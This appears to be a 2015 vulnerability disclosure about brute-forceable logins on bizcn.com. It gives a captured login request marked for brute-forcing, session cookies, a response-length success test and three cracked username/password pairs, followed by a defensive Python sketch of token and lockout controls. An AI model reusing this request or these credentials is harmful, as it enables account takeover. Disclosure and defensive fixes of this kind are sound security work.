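2015-09-23: Details reported to the vendor; awaiting vendor handling
2015-09-24: Vendor confirmed; details disclosed to the vendor only
2015-10-04: Details disclosed to core white hats and experts in related fields
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public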
66666666666666
The user login can be brute-forced: http://www.bizcn.com/login?module=memberzone
POST /login HTTP/1.1
Host: www.bizcn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bizcn.com/login?module=memberzone
Cookie: ptrsrv=48a3d0dc88dd3a2f242b7f5cc6400836; JSESSIONID=85F077DA4B16769D6CBFE4758A3F21B1-vcp; Hm_lvt_074a14d55646fb99f2b80b6d5ce4a377=1442915997; Hm_lpvt_074a14d55646fb99f2b80b6d5ce4a377=1442916069; CNZZDATA1253027197=1004649916-1442915996-%7C1442915996; IESESSION=alive; pgv_pvi=5128890368; pgv_si=s9461657600
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

module=enterzone&login_name=§kcorppropertygroup%40163.com§&password=§aaaaaaaaaaaaa§&validatetoken=c56805ac434841b8b7eb5ba3932d7fbe
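The token that was added is completely useless, it is purely for show... The login can be brute-forced.
A response length greater than 5000 indicates a successful account.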
user:sale pwd:sale
user:songjun pwd:songjun
user:weibo pwd:weibo
Handle it as you see fit 26666
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-09-24 09:51
Received, being handled.
None yet
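A server-side sketch of the two controls the request above shows missing, added here as an example and not taken from the report or the vendor's code. It assumes the token was ineffective because the same validatetoken value was accepted on repeated requests (only login_name and password vary in the captured request); LoginGuard, MAX_FAILURES and LOCK_SECONDS are hypothetical names and thresholds.

```python
import secrets
import time

MAX_FAILURES = 5      # assumed threshold, tune per deployment
LOCK_SECONDS = 900    # assumed lockout window

class LoginGuard:
    """Single-use login form tokens plus per-account failure throttling."""

    def __init__(self, check_password, clock=time.monotonic):
        self._check = check_password   # callable(login_name, password) -> bool
        self._clock = clock
        self._tokens = {}              # session_id -> the one outstanding token
        self._failures = {}            # login_name -> (count, time of first failure)

    def issue_token(self, session_id):
        """Call when rendering the login form; invalidates any earlier token."""
        token = secrets.token_hex(16)
        self._tokens[session_id] = token
        return token

    def login(self, session_id, login_name, password, validatetoken):
        # Consume the token first, so a replayed value fails on its second use.
        expected = self._tokens.pop(session_id, None)
        if expected is None or not secrets.compare_digest(
                expected.encode(), str(validatetoken).encode()):
            return "bad_token"
        now = self._clock()
        count, since = self._failures.get(login_name, (0, now))
        if now - since >= LOCK_SECONDS:       # window expired, start over
            count, since = 0, now
        if count >= MAX_FAILURES:             # locked even if the password is right
            return "locked"
        if self._check(login_name, password):
            self._failures.pop(login_name, None)
            return "ok"
        self._failures[login_name] = (count + 1, since)
        return "denied"

if __name__ == "__main__":
    # Constructed sample account, not from the report.
    accounts = {"alice@example.test": "correct horse battery"}
    guard = LoginGuard(lambda u, p: accounts.get(u) == p)
    tok = guard.issue_token("sess-1")
    print(guard.login("sess-1", "alice@example.test", "guess", tok))   # denied
    print(guard.login("sess-1", "alice@example.test", "guess", tok))   # bad_token
```

Returning the same page body for "denied", "locked" and "bad_token" also removes the response-length signal the report used to tell successful logins apart from failures.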